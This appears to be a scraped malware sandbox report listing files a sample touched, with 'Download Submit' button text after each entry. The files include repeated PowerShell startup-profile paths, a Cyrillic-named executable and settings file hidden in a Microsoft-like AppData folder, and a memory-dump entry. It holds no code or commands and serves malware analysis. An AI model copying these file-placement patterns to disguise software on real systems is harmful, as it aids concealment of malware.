C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Roaming\msspeedlib\settings.ini

Download Submit
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe

Download Submit
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe

Download Submit
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe

Download Submit
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe

Download Submit
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe

Download Submit
C:\Users\Admin\AppData\Roaming\msspeedlib\рАПкеЧСыФе.exe

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
memory/4692-2-0x0000000010000000-0x000000001001E000-memory.dmp

Filesize
120KB

Download